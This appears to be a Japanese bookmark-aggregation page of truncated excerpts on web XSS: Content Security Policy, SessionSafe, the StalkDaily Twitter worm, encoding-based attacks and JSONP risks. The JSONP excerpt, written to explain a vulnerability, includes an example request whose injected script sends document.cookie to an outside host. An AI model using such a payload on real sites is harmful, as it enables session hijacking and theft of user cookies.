だいぶ間があいてしまいましたが、本年1月31日に開催された、第04回まっちゃ445勉強会目覚まし勉強会におけるライトニングトークの資料を公開します。 UnicodeによるXSSとSQLインジェクションの可能性View more presentations from ockeghem.
「Shutting Down XSS with Content Security Policy」より June 19,2009 posted by Brandon Sterne,Security Program Manager 人気Webサイトの多くは数年前からクロスサイト・スクリプティング(XSS)攻撃に悩まされ,アクセスしてきたユーザーに被害を及ぼしてきた。米モジラは2008年から,XSS攻撃の阻止を目的とする新技術「Content Security Policy」(CSP)の開発に取り組んでいる。当記事でこの技術の背景を簡単に紹介するとともに,これまでの進ちょく状況を説明しよう。 XSS攻撃が実行可能なのは,コンテンツ要求元のWebブラウザ上で,Webサーバーからの応答結果として得られるすべてのコンテンツが同じ権限で扱われるためである。Webページ内にあるJavaScriptとその他
世界最大のコンピュータセキュリティカンファレンス Black Hat 今回は少し脱線して、Black Hatというカンファレンスからおもしろいトピックをいくつか紹介したいと思います。 Black Hatはコンピュータセキュリティに関するカンファレンスとしては、世界最大クラスのカンファレンスです。2007年は8月1、2日にラスベガスで開催され、世界中から5,000人以上が参加したそうです。コンピュータセキュリティについて幅広く発表が行われ、その内容はカーネル、ネットワーク、フォレンジック、プライバシー等多岐に渡ります。 そうは言ってもこの連載でWebと関係のない話をするわけではなく、Webのセキュリティに焦点を当てて紹介していきます。2004年ごろからWebアプリケーションの話題が多くなっており、今年もApplication Securityという分野で一部屋が取られていました(今年は全部で
SessionSafeは、ハンブルグ大学のMartin Johnsさんが書いたWeb APの方式案です。 もしWeb APにXSS脆弱性があって、これが攻撃されたとしても、 セッションIDが盗まれない 当該ページ以外の情報が窃取・改竄されない ことを目指しています。 面白いなーと思ったので、内容について少し書きます。 なお、元記事を高速斜め読みしたので、この日記の内容には間違いが含まれているかもしれません。興味のある方は原本を見てください。 セッションIDが盗まれない 以下の二つのドメインがあるとします。 www.example.com secure.example.com セッションIDのCookieは、secureサブドメインに発行します。 Webページを表示する際はwww.example.comのURLにアクセスします。そこで返すHTMLに色々と仕掛けを施します。 HTMLの仕掛け
The SDL also permits a small set of attributes for these elements, but before we get into this, it's more important to discuss validation techniques. One of the most effective techniques for validating user input is to use a regular expression, either through the RegularExpressionValidator control or the Regex class: // ensure the user input matches the form of a US ZIP code if (!Regex.IsMatch(Te
Maddin, 5. März 2007 um 16:46:28 MEZ Paper: SessionSafe - Implementing XSS Immune Session Handling My SessionSafe-paper is online for quite a while now, but I never found the time to write about it. The paper describes three methods that, if used in combination, allow to protect web applications against session hijacking even in situations when a XSS attack already successfully injected malicious
(2009/04/12 6:40 pm 追記しました) (2009/04/12 7:24 pm 再度追記しました) 先ほどから Twitter上にて XSS のよる被害が出ています。 既に海外のブログなどでも取り上げられています。 HOWTO: Remove StalkDaily.com Auto-Tweets From Your Infected Twitter Profile (Twittercsm) Warning: Twitter Hit By StalkDaily Worm (TechCrunch) 既に XSS の部分は改修されて大分収まったようですが、念のために書いておきます。 内容としては、 1. StalkDaily.com を宣伝するつぶやきが勝手に投稿される 2. プロフィールの Web が改ざんされる 3. 改ざんされたユーザーのページを見ると、自分のプロフィールも
文:Dancho Danchev(Special to ZDNet.com) 翻訳校正:石橋啓一郎 2009-04-15 03:49 4月第2週の週末と、それに続く月曜日の早い時間、StalkDaily.com XSSワームから派生した少なくとも4つの亜種が、人気のマイクロブログサイトTwitterを襲った。これらのワームは、同サイトのクロスサイトスクリプティングのセキュリティホールを悪用することによって自動的にアカウントをハイジャックし、そのアカウントの所有者に成り代わってtweetを投稿することにより、ワーム作者のウェブサイトをへのリンクを広めた。 このワームの作者である17歳のMikey Mooney氏は、退屈だったのでこのワームを作ったと述べており(同氏の写真もあり、インタビューのポッドキャストもある)、同氏は月曜日に登場した一番最近の亜種は、Twitterがその日早くに対処したと
2009年03月03日19:00 カテゴリLightweight Languages perl - EncodeでXSSを防ぐ 良記事。 第7回■文字エンコーディングが生み出すぜい弱性を知る:ITpro だけど、問題点のみ具体例があって、対策にないのが片手落ちに感じられたので、その点を補足。 結論だけ言ってしまえば、Perlなら以下の原則を守るだけです。 404 Blog Not Found:perl - Encode 入門 すでにOSCONでもYAPCでも、あちこちそちこちでこの基本方針に関しては話したのですが、ここ 404 Blog Not Found でも改めて。 Perl で utf8 化けしたときにどうしたらいいか - TokuLog 改め だまってコードを書けよハゲ入り口で decode して、内部ではすべて flagged utf8 で扱い、出口で encode する。これが
« E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
Google is vulnerable to cross site scripting. While surfing around the personalization section of Google I ran accross the RSS feed addition tool which is vulnerable to XSS. The employees at Google were aware of XSS as they protected against it as an error condition, however if you input a valid URL (like my RSS feed) it will return with a JavaScript function containing the URL. If you append the
はてなグループの終了日を2020年1月31日(金)に決定しました 以下のエントリの通り、今年末を目処にはてなグループを終了予定である旨をお知らせしておりました。 2019年末を目処に、はてなグループの提供を終了する予定です - はてなグループ日記 このたび、正式に終了日を決定いたしましたので、以下の通りご確認ください。 終了日: 2020年1月31日(金) エクスポート希望申請期限:2020年1月31日(金) 終了日以降は、はてなグループの閲覧および投稿は行えません。日記のエクスポートが必要な方は以下の記事にしたがって手続きをしてください。 はてなグループに投稿された日記データのエクスポートについて - はてなグループ日記 ご利用のみなさまにはご迷惑をおかけいたしますが、どうぞよろしくお願いいたします。 2020-06-25 追記 はてなグループ日記のエクスポートデータは2020年2月28
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く